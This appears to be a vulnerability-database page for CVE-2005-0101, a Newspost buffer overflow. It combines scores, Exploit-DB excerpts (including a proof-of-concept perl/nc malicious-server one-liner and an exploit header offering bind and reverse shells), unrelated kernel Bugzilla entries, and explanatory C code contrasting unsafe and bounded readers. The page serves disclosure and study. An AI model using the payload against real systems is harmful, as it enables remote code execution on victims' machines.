CVE-2005-0101
Published 2005-02-01
Priority: P3 (37); severity high; CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 15.87% (96.5th percentile)
Buffer overflow in the socket_getline function in Newspost 2.1.1 and earlier allows remote malicious NNTP servers to execute arbitrary code via a long string without a newline character.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| newspost | newspost | <= 2.1.1 | — |
No detection rules found.
Exploit-DB
Tcpdump - bgp_update_print Remote Denial of Service (CVE-2005-1267)
exploitdb · 2005-06-09
---
/*
* 2005-05-31: Modified by [email protected] to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Frédéric Raynal
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
Exploit-DB
Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service (CVE-2005-1204)
exploitdb · 2005-04-20
---
source: https://www.securityfocus.com/bid/13281/info
Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.
A remote attacker may exploit this condition to crash the software and effectively deny service to legitimate users.
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
Exploit-DB
Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2) (CVE-2005-0101)
exploitdb · 2005-02-03
---
/*
* v0.2
* Newspost "socket_getline()" Buffer Overflow Exploit
* Exploit
* Bug discovered: 02/03/2005
*
* cybertronic[at]gmx[dot]net
*
* [ cybertronic @ newspost ] $ gcc -o newspost_expl newspost_expl.c
* [ cybertronic @ newspost ] $ ./newspost_expl cyber tronic
* Usage
* -----
* [ Bindshell ] ./newspost_expl
* [ Reverseshell ] ./newspost_expl [CONNECTBACK IP]
* [ cybertronic @ newspost ] $ ./newspost_expl
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ newspost-2.1
Exploit-DB
Newspost 2.0/2.1 - Remote Buffer Overflow (CVE-2005-0101)
exploitdb · 2005-02-01
---
source: https://www.securityfocus.com/bid/12418/info
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior; however, other versions may also be vulnerable.
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
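The bug class the advisory describes, as an added example that is not Newspost's socket.c: a response-line reader that copies bytes from the NNTP server into a fixed buffer until it sees a newline, beside a bounded version that rejects an over-long line instead of writing past the buffer. The in-memory stand-in for the socket, the 256-byte buffer size and every function name are assumptions; the attack input mirrors the perl one-liner above (1024 'A's with no newline, then the marker bytes).

```c
/* Added example, not Newspost code. Models the socket_getline() bug class:
 * a line reader whose only stop condition is '\n', next to a bounded one.
 * The socket is replaced by an in-memory byte stream so this runs offline. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

#define LINE_BUF 256   /* hypothetical fixed buffer size, not Newspost's */

/* Constructed stand-in for a connected socket: hands out one byte per call
 * from an in-memory server response. Returns 1 on data, 0 at EOF. */
struct fake_sock { const char *data; size_t len; size_t pos; };

static int sock_read_byte(struct fake_sock *s, char *out)
{
    if (s->pos >= s->len) return 0;
    *out = s->data[s->pos++];
    return 1;
}

/* Vulnerable shape: copies until '\n' or EOF with no bound on n, so a server
 * that never sends a newline writes past the end of buf. Kept for contrast
 * and only ever fed a benign greeting below. */
static int unsafe_getline(struct fake_sock *s, char *buf)
{
    size_t n = 0;
    char c;
    while (sock_read_byte(s, &c)) {
        buf[n++] = c;              /* no check against the buffer size */
        if (c == '\n') break;
    }
    buf[n] = '\0';
    return (int)n;
}

/* Hardened shape: stops at '\n', EOF, or a full buffer. Returns the number
 * of bytes stored, or -1 when the line would not fit, so the caller can
 * drop the connection rather than act on a truncated or overflowing line. */
static int safe_getline(struct fake_sock *s, char *buf, size_t bufsz)
{
    size_t n = 0;
    char c;
    if (bufsz == 0) return -1;
    while (sock_read_byte(s, &c)) {
        if (n + 1 >= bufsz) {      /* must leave room for this byte + NUL */
            buf[0] = '\0';
            return -1;
        }
        buf[n++] = c;
        if (c == '\n') break;
    }
    buf[n] = '\0';
    return (int)n;
}

/* Parse the NNTP status code from a server response; -1 if the line was rejected. */
static int read_status(const char *response, size_t len)
{
    struct fake_sock s = { response, len, 0 };
    char line[LINE_BUF];
    if (safe_getline(&s, line, sizeof line) < 0) return -1;
    return atoi(line);
}

/* Same payload shape as the perl server above: 1024 'A's, no newline, then
 * the 16 marker bytes. Returns the bounded reader's verdict. */
static int attack_line_result(void)
{
    static char payload[1024 + 16];
    memset(payload, 'A', 1024);
    memcpy(payload + 1024, "BBBBCCCCDDDDEEEE", 16);
    struct fake_sock s = { payload, sizeof payload, 0 };
    char line[LINE_BUF];
    return safe_getline(&s, line, sizeof line);
}

/* Boundary probe: a line of `total` bytes (last one '\n'); total <= 512. */
static int line_of_length(size_t total)
{
    static char buf[512];
    if (total == 0 || total > sizeof buf) return -1;
    memset(buf, 'x', total - 1);
    buf[total - 1] = '\n';
    struct fake_sock s = { buf, total, 0 };
    char line[LINE_BUF];
    return safe_getline(&s, line, sizeof line);
}

int main(void)
{
    const char greeting[] = "200 news.example.org InterNetNews ready (posting ok)\r\n";
    struct fake_sock s = { greeting, sizeof greeting - 1, 0 };
    char line[LINE_BUF];
    printf("unsafe reader, benign greeting: %d bytes\n", unsafe_getline(&s, line));
    printf("status code: %d\n", read_status(greeting, sizeof greeting - 1));
    printf("255-byte line: %d, 256-byte line: %d\n", line_of_length(255), line_of_length(256));
    printf("1024 bytes without newline: %d (rejected)\n", attack_line_result());
    return 0;
}
```

The bound is checked before the store, and a rejected line returns a distinct error rather than a silently truncated string, because a truncated NNTP response that still parses as a status line is its own source of confusion.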
Bugzilla
CVE-2005-3106 exec_mmap race DoS [MEDIUM]
bugzilla · 2005-10-10 · CVSS 4.7
Race condition in Linux 2.6, when threads are sharing memory mapping via
CLONE_VM (such as linuxthreads and vfork), might allow local users to cause a
denial of service (deadlock) by triggering a core dump while waiting for a
thread that has just performed an exec.
Fixed upstream in 2.6.11:
http://linux.bkbits.net:8080/linux-2.6/cset@41e9a98dJKJjUrTCrKsyak1DOQxQug
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
Bugzilla
CVE-2005-3276 sys_get_thread_area minor info leak [LOW]
bugzilla · 2005-09-20 · CVSS 2.1
sys_get_thread_area does a copy_to_user on a partially unitialized structure,
which can leak a few random bits of information to userspace.
http://linux.bkbits.net:8080/linux-2.6/cset@42e81864gSEM90Oun0jA8dufpM3inw
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
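The pattern behind this note, as an added example that is not kernel code: a routine fills a few members of a struct on its stack and copies the whole object out to userspace, so any bits it never assigned carry whatever the stack held before. The struct shape (loosely modelled on a descriptor with single-bit flags), the names, and the memcpy stand-in for copy_to_user are assumptions; a differential run with two stale-stack patterns counts the bits that reach userspace without having been assigned.

```c
/* Added example, not kernel code. Models the copy_to_user-of-a-partially-
 * initialised-struct bug class. The "previous stack contents" are supplied
 * as a constructed byte pattern so the leak is visible and deterministic. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical output struct: three words, then single-bit flags packed into
 * a fourth 32-bit word. Only 7 of that word's 32 bits are ever assigned. */
struct desc_out {
    uint32_t entry_number;
    uint32_t base_addr;
    uint32_t limit;
    uint32_t seg_32bit       : 1;
    uint32_t contents        : 2;
    uint32_t read_exec_only  : 1;
    uint32_t limit_in_pages  : 1;
    uint32_t seg_not_present : 1;
    uint32_t useable         : 1;
};

/* Stand-in for copy_to_user(): the whole object crosses the boundary. */
static void fake_copy_to_user(void *user_dst, const void *kern_src, size_t n)
{
    memcpy(user_dst, kern_src, n);
}

/* The members the routine actually sets (constructed values). */
static void fill_fields(struct desc_out *d)
{
    d->entry_number = 6;
    d->base_addr = 0;
    d->limit = 0xFFFFF;
    d->seg_32bit = 1;
    d->contents = 0;
    d->read_exec_only = 0;
    d->limit_in_pages = 1;
    d->seg_not_present = 0;
    d->useable = 1;
}

/* Vulnerable shape. `stale` simulates what the stack slot held before the
 * call; the untouched 25 flag bits keep that value and are copied out. */
static void get_desc_leaky(unsigned char *user_buf, unsigned char stale)
{
    struct desc_out info;
    memset(&info, stale, sizeof info);   /* "previous stack contents" */
    fill_fields(&info);
    fake_copy_to_user(user_buf, &info, sizeof info);
}

/* Fixed shape: clear the whole object before filling it. */
static void get_desc_fixed(unsigned char *user_buf, unsigned char stale)
{
    struct desc_out info;
    memset(&info, stale, sizeof info);   /* same starting condition */
    memset(&info, 0, sizeof info);       /* the fix */
    fill_fields(&info);
    fake_copy_to_user(user_buf, &info, sizeof info);
}

/* Differential check, independent of bitfield layout: run the routine with
 * two different stale patterns and count output bits that differ. Assigned
 * members are identical in both runs, so every differing bit is stack data. */
static int leaked_bits(void (*routine)(unsigned char *, unsigned char))
{
    unsigned char a[sizeof(struct desc_out)], b[sizeof(struct desc_out)];
    int bits = 0;
    routine(a, 0xAA);
    routine(b, 0x55);
    for (size_t i = 0; i < sizeof a; i++)
        for (unsigned char x = a[i] ^ b[i]; x; x >>= 1)
            bits += x & 1;
    return bits;
}

int main(void)
{
    printf("leaky routine: %d stack bits reach userspace\n", leaked_bits(get_desc_leaky));
    printf("fixed routine: %d stack bits reach userspace\n", leaked_bits(get_desc_fixed));
    return 0;
}
```

The differential measurement is the same idea a reviewer can apply to any kernel-to-user copy: if the output changes when only the prior stack contents change, something uninitialised is crossing the boundary.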
Bugzilla
CVE-2005-3044 lost fput and sockfd_put could lead to DoS [LOW]
bugzilla · 2005-09-19 · CVSS 2.1
patch is obviously correct and should be applied even if there had been
no security implications.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
---
SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that CVE-2005-3044
is still not fully fixed in RHEL4 kernel 2.6.9-42.0.8
Please see the following for details:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=227978
---
References (historical):
http://marc.info/?l=bugtraq&m=110746336728781&w=2
http://people.freebsd.org/~niels/issues/newspost-20050114.txt
http://secunia.com/advisories/14092/
http://secunia.com/advisories/14098
http://security.gentoo.org/glsa/glsa-200502-05.xml
http://securitytracker.com/id?1013056
http://www.securityfocus.com/bid/12418
http://www.vuxml.org/freebsd/7f13607b-6948-11d9-8937-00065be4b5b6.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/19178